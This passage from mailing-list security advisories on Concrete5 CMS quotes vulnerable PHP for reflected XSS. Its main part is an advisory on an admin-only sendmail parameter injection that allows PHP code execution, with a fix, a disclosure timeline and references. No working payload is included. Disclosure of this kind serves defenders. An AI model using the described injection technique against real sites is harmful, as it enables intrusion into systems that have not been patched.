19.         if (isset($_REQUEST[$fieldName])) {
20.             $selectedUID = $_REQUEST[$fieldName];
21.         } else if ($uID > 0) {
22.             $selectedUID = $uID;
23.         }
24. 
25.         $html = '';
26.         $html .= ' ...
27.         if ($selectedUID > 0) {
28.             $ui = UserInfo::getByID($selectedUID);
29.             $html .= $ui->getUserName();
30.         }
31.         $html .= '';
32.         $identifier = new \Concrete\Core\Utility\Service\Identifier();
33.         $selector = $identifier->getString(32);
34.         $html .= '';
36.         $html .= '';

User input passed through the "uID" request parameter is not properly
sanitized before being used to generate HTML output at line 35. This can be
exploited to conduct reflected Cross-Site Scripting (XSS) attacks.

3) The vulnerable code is located in /concrete/elements/group/search.php:

4.  $searchRequest = $_REQUEST;
5.  $result = Loader::helper('json')->encode($controller->getSearchResultObject()->getJSONObject());
6.  $tree = GroupTree::get();
7.  $guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);
8.  $registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);
9.  ?>
10. 
11. 
12. div[data-search=groups] form.ccm-search-fields {
13.     margin-left: 0px !important;
14. }
15. 
16. 
17. 
18. 

[FD] [KIS-2015-01] Concrete5 <= 5.7.3.1 (sendmail) Remote Code Execution Vulnerability

2015-06-11 Thread Egidio Romano
---
Concrete5 <= 5.7.3.1 (sendmail) Remote Code Execution Vulnerability
---


[-] Software Link:

https://www.concrete5.org/


[-] Affected Versions:

Version 5.7.3.1 and probably other versions.


[-] Vulnerability Description:

The vulnerable code is located in /concrete/controllers/single_page/dashboard/system/registration/open.php:

21.     switch ($this->post('registration_type')) {
22.         case "enabled":
23.             Config::save('concrete.user.registration.enabled', true);
24.             Config::save('concrete.user.registration.validate_email', false);
25.             Config::save('concrete.user.registration.approval', false);
26.             Config::save('concrete.user.registration.notification', $this->post('register_notification'));
27.             Config::save(
28.                 'concrete.user.registration.notification_email',
29.                 Loader::helper('security')->sanitizeString(
30.                     $this->post('register_notification_email')));
31.             break;

User input passed through the "register_notification_email" POST parameter is
not properly sanitized before being stored into a configuration setting at
lines 27-30 (the sanitizeString() method doesn’t check if it is a valid email
address). This value is used as a sender email address to send out a
notification email when a new user is being registered, and this is done using
the PHP mail() function, specifically passing such value to its fifth
parameter. So, when sendmail is used to send out such an email, it is possible
to alter the command line and tell the sendmail program to log all the email
traffic in an arbitrary file chosen by the attacker, resulting in an arbitrary
PHP code execution. This vulnerability is mitigated by the fact that it can be
exploited only by authenticated administrator users (even though it could be
exploited via a Cross-Site Request Forgery attack as well) and only if the
email is being sent with sendmail.


[-] Solution:

Update to version 5.7.4 or later.


[-] Disclosure Timeline:

[05/05/2015] - Vulnerability details sent through HackerOne
[05/05/2015] - Vendor said a patch has been committed and will be available in 
the next version
[07/05/2015] - Version 5.7.4 released along with the patch for this 
vulnerability
[06/06/2015] - Vulnerability publicly disclosed on HackerOne
[11/06/2014] - CVE number requested
[11/06/2014] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has not 
assigned a name to this vulnerability yet.


[-] Credits:

Vulnerability discovered by Egidio Romano of Minded Security.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2015-01


[-] Other References:

https://hackerone.com/reports/59663
